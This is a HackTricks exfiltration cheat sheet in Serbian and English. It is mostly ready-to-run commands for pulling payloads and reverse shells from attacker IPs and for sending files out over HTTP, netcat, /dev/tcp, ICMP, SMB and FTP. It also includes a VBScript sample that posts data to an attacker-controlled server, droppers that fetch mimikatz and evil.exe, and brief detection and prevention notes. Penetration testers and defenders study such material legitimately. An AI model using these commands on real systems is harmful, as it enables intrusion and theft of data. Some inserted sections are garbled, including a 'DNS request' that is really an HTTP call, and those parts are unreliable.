Serbian - Ht
HackTricks Training Twitter Linkedin Sponsor

Exfiltration

Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)!

Drugi načini podrške HackTricks-u:

Try Hard Security Group

Često beleženi domeni za izfiltriranje informacija

Proverite https://lots-project.com/ da biste pronašli često beležene domene koje mogu biti zloupotrebljene

Kopiranje&lepljenje Base64

Linux

base64 -w0 <file> #Encode file
base64 -d file #Decode file

Windows

certutil -encode payload.dll payload.b64
certutil -decode payload.b64 payload.dll

HTTP

Linux

wget 10.10.14.14:8000/tcp_pty_backconnect.py -O /dev/shm/.rev.py
wget 10.10.14.14:8000/tcp_pty_backconnect.py -P /dev/shm
curl 10.10.14.14:8000/shell.py -o /dev/shm/shell.py
fetch 10.10.14.14:8000/shell.py #FreeBSD

Windows

certutil -urlcache -split -f http://webserver/payload.b64 payload.b64
bitsadmin /transfer transfName /priority high http://example.com/examplefile.pdf C:\downloads\examplefile.pdf

#PS
(New-Object Net.WebClient).DownloadFile("http://10.10.14.2:80/taskkill.exe","C:\Windows\Temp\taskkill.exe")
Invoke-WebRequest "http://10.10.14.2:80/taskkill.exe" -OutFile "taskkill.exe"
wget "http://10.10.14.2/nc.bat.exe" -OutFile "C:\ProgramData\unifivideo\taskkill.exe"

Import-Module BitsTransfer
Start-BitsTransfer -Source $url -Destination $output
#OR
Start-BitsTransfer -Source $url -Destination $output -Asynchronous

Postavljanje fajlova

# Listen to files
python3 -m pip install --user uploadserver
python3 -m uploadserver
# With basic auth:
# python3 -m uploadserver --basic-auth hello:world

# Send a file
curl -X POST http://HOST/upload -H -F 'files=@file.txt'
# With basic auth:
# curl -X POST http://HOST/upload -H -F 'files=@file.txt' -u hello:world

HTTPS Server

HTTPS Server

# from https://gist.github.com/dergachev/7028596
# taken from http://www.piware.de/2011/01/creating-an-https-server-in-python/
# generate server.xml with the following command:
#    openssl req -new -x509 -keyout server.pem -out server.pem -days 365 -nodes
# run as follows:
#    python simple-https-server.py
# then in your browser, visit:
#    https://localhost:443

### PYTHON 2
import BaseHTTPServer, SimpleHTTPServer
import ssl

httpd = BaseHTTPServer.HTTPServer(('0.0.0.0', 443), SimpleHTTPServer.SimpleHTTPRequestHandler)
httpd.socket = ssl.wrap_socket (httpd.socket, certfile='./server.pem', server_side=True)
httpd.serve_forever()
###

### PYTHON3
from http.server import HTTPServer, BaseHTTPRequestHandler
import ssl

httpd = HTTPServer(('0.0.0.0', 443), BaseHTTPRequestHandler)
httpd.socket = ssl.wrap_socket(httpd.socket, certfile="./server.pem", server_side=True)
httpd.serve_forever()
###

### USING FLASK
from flask import Flask, redirect, request
from urllib.parse import quote
app = Flask(__name__)
@app.route('/')
def root():
print(request.get_json())
return "OK"
if __name__ == "__main__":
app.run(ssl_context='adhoc', debug=True, host="0.0.0.0", port=8443)
###

FTP

FTP server (python)

pip3 install pyftpdlib
python3 -m pyftpdlib -p 21

FTP server (NodeJS)

sudo npm install -g ftp-srv --save
ftp-srv ftp://0.0.0.0:9876 --root /tmp

FTP server (pure-ftp)

apt-get update && apt-get install pure-ftp
#Run the following script to configure the FTP server
#!/bin/bash
groupadd ftpgroup
useradd -g ftpgroup -d /dev/null -s /etc ftpuser
pure-pwd useradd fusr -u ftpuser -d /ftphome
pure-pw mkdb
cd /etc/pure-ftpd/auth/
ln -s ../conf/PureDB 60pdb
mkdir -p /ftphome
chown -R ftpuser:ftpgroup /ftphome/
/etc/init.d/pure-ftpd restart

Windows klijent

#Work well with python. With pure-ftp use fusr:ftp
echo open 10.11.0.41 21 > ftp.txt
echo USER anonymous >> ftp.txt
echo anonymous >> ftp.txt
echo bin >> ftp.txt
echo GET mimikatz.exe >> ftp.txt
echo bye >> ftp.txt
ftp -n -v -s:ftp.txt

SMB

Kali kao server

kali_op1> impacket-smbserver -smb2support kali `pwd` # Share current directory
kali_op2> smbserver.py -smb2support name /path/folder # Share a folder
#For new Win10 versions
impacket-smbserver -smb2support -user test -password test test `pwd`

Ili kreirajte smb deljenje koristeći sambu:

apt-get install samba
mkdir /tmp/smb
chmod 777 /tmp/smb
#Add to the end of /etc/samba/smb.conf this:
[public]
comment = Samba on Ubuntu
path = /tmp/smb
read only = no
browsable = yes
guest ok = Yes
#Start samba
service smbd restart

Windows

Exfiltration

Exfiltration Over Alternative Protocol

  1. Description

    Data exfiltration can be achieved using various protocols other than HTTP/HTTPS, such as DNS, ICMP, or SMTP.

  2. Detection

    • Monitor network traffic for unusual DNS requests, especially those containing encoded data.

    • Look for abnormal ICMP or SMTP traffic patterns.

    • Implement egress filtering to restrict unnecessary outbound traffic.

  3. Prevention

    • Use encryption to protect data in transit.

    • Implement network segmentation to limit lateral movement.

    • Disable unnecessary services and protocols to reduce attack surface.

  4. Tools

    • dnscat2: A tool for tunneling data through DNS servers.

    • Iodine: A tool for tunneling IPv4 data through a DNS server.

Exfiltration Over Unencrypted Protocols

  1. Description

    Attackers can exfiltrate data over unencrypted protocols like FTP, Telnet, or SNMP.

  2. Detection

    • Monitor network traffic for FTP, Telnet, or SNMP connections.

    • Look for large amounts of data being transferred over these protocols.

    • Implement deep packet inspection to analyze payload contents.

  3. Prevention

    • Use secure protocols like SFTP, SSH, or SNMPv3.

    • Implement strong authentication mechanisms.

    • Encrypt data at rest and in transit.

  4. Tools

    • Wireshark: A network protocol analyzer for monitoring and analyzing network traffic.

    • Snort: An open-source network intrusion detection and prevention system.

CMD-Wind> \\10.10.14.14\path\to\exe
CMD-Wind> net use z: \\10.10.14.14\test /user:test test #For SMB using credentials

WindPS-1> New-PSDrive -Name "new_disk" -PSProvider "FileSystem" -Root "\\10.10.14.9\kali"
WindPS-2> cd new_disk:

SCP

Napadač mora imati pokrenut SSHd.

scp <username>@<Attacker_IP>:<directory>/<filename>

SSHFS

Ako žrtva ima SSH, napadač može montirati direktorijum sa žrtve na napadača.

sudo apt-get install sshfs
sudo mkdir /mnt/sshfs
sudo sshfs -o allow_other,default_permissions <Target username>@<Target IP address>:<Full path to folder>/ /mnt/sshfs/

NC

NC (Netcat) je moćan alat za mrežno programiranje koji se često koristi za prenos podataka između sistema putem mreže. Može se koristiti za izvršavanje različitih zadataka, uključujući i eksfiltraciju podataka.

nc -lvnp 4444 > new_file
nc -vn <IP> 4444 < exfil_file

/dev/tcp

Preuzimanje fajla sa žrtvine mašine

nc -lvnp 80 > file #Inside attacker
cat /path/file > /dev/tcp/10.10.10.10/80 #Inside victim

Postavljanje fajla žrtvi

nc -w5 -lvnp 80 < file_to_send.txt # Inside attacker
# Inside victim
exec 6< /dev/tcp/10.10.10.10/4444
cat <&6 > file.txt

Zahvaljujući @BinaryShadow_

ICMP

# To exfiltrate the content of a file via pings you can do:
xxd -p -c 4 /path/file/exfil | while read line; do ping -c 1 -p $line <IP attacker>; done
#This will 4bytes per ping packet (you could probably increase this until 16)
from scapy.all import *
#This is ippsec receiver created in the HTB machine Mischief
def process_packet(pkt):
if pkt.haslayer(ICMP):
if pkt[ICMP].type == 0:
data = pkt[ICMP].load[-4:] #Read the 4bytes interesting
print(f"{data.decode('utf-8')}", flush=True, end="")

sniff(iface="tun0", prn=process_packet)

SMTP

Ako možete slati podatke na SMTP server, možete kreirati SMTP da primite podatke pomoću python-a:

sudo python -m smtpd -n -c DebuggingServer :25

TFTP

Podrazumevano u XP i 2003 (u drugima mora biti eksplicitno dodato tokom instalacije)

Na Kali, pokreni TFTP server:

#I didn't get this options working and I prefer the python option
mkdir /tftp
atftpd --daemon --port 69 /tftp
cp /path/tp/nc.exe /tftp

TFTP server u Pythonu:

pip install ptftpd
ptftpd -p 69 tap0 . # ptftp -p <PORT> <IFACE> <FOLDER>

Na žrtvu, povežite se sa Kali serverom:

tftp -i <KALI-IP> get nc.exe

PHP

Preuzmite fajl pomoću PHP jednolinijske komande:

echo "<?php file_put_contents('nameOfFile', fopen('http://192.168.1.102/file', 'r')); ?>" > down2.php

VBScript

VBScript Exfiltration Techniques

VBScript can be used to exfiltrate data from a compromised system. Below are some common techniques:

  1. Writing to Files: VBScript can write data to a file on the system, which can then be exfiltrated using various methods.

  2. Sending Emails: VBScript can be used to send emails with the exfiltrated data as attachments or within the email body.

  3. HTTP Requests: VBScript can make HTTP requests to an external server controlled by the attacker to exfiltrate data.

  4. DNS Requests: VBScript can make DNS requests with encoded data to exfiltrate information.

Example VBScript Exfiltration Code

' Example VBScript code for exfiltrating data

' Write data to a file
Set objFSO = CreateObject("Scripting.FileSystemObject")
Set objFile = objFSO.CreateTextFile("C:\exfiltrated_data.txt", True)
objFile.Write "Sensitive data to exfiltrate"
objFile.Close

' Send an email
Set objEmail = CreateObject("CDO.Message")
objEmail.From = "attacker@example.com"
objEmail.To = "recipient@example.com"
objEmail.Subject = "Exfiltrated Data"
objEmail.TextBody = "Attached is the exfiltrated data."
objEmail.AddAttachment "C:\exfiltrated_data.txt"
objEmail.Configuration.Fields.Item("http://schemas.microsoft.com/cdo/configuration/sendusing") = 2
objEmail.Configuration.Fields.Item("http://schemas.microsoft.com/cdo/configuration/smtpserver") = "smtp.example.com"
objEmail.Configuration.Fields.Item("http://schemas.microsoft.com/cdo/configuration/smtpserverport") = 25
objEmail.Configuration.Fields.Update
objEmail.Send

' Make an HTTP request
Set objHTTP = CreateObject("MSXML2.ServerXMLHTTP")
objHTTP.Open "GET", "http://attacker-controlled-server.com/exfiltrate.php?data=exfiltrated_data", False
objHTTP.Send

' Make a DNS request
Set objDNS = CreateObject("MSXML2.ServerXMLHTTP")
objDNS.Open "GET", "http://attacker-controlled-dns.com", False
objDNS.Send

These are just a few examples of how VBScript can be used for exfiltration. It is important to note that using VBScript for malicious purposes is illegal and unethical.

Attacker> python -m SimpleHTTPServer 80

Žrtva

echo strUrl = WScript.Arguments.Item(0) > wget.vbs
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
echo Dim http, varByteArray, strData, strBuffer, lngCounter, fs, ts >> wget.vbs
echo Err.Clear >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs
echo If http Is Nothing Then Set http =CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs
echo http.Open "GET", strURL, False >> wget.vbs
echo http.Send >> wget.vbs
echo varByteArray = http.ResponseBody >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs
echo Set ts = fs.CreateTextFile(StrFile, True) >> wget.vbs
echo strData = "" >> wget.vbs
echo strBuffer = "" >> wget.vbs
echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1, 1))) >> wget.vbs
echo Next >> wget.vbs
echo ts.Close >> wget.vbs
cscript wget.vbs http://10.11.0.5/evil.exe evil.exe

Debug.exe

Program debug.exe ne samo što omogućava inspekciju binarnih fajlova već takođe ima mogućnost da ih rekonstruiše iz heksadecimalnog koda. To znači da, pružajući heksadecimalni kod binarnog fajla, debug.exe može generisati binarni fajl. Međutim, važno je napomenuti da debug.exe ima ograničenje u sastavljanju fajlova do veličine od 64 kb.

# Reduce the size
upx -9 nc.exe
wine exe2bat.exe nc.exe nc.txt

DNS

PreviousBasic PythonNextTunneling and Port Forwarding

Last updated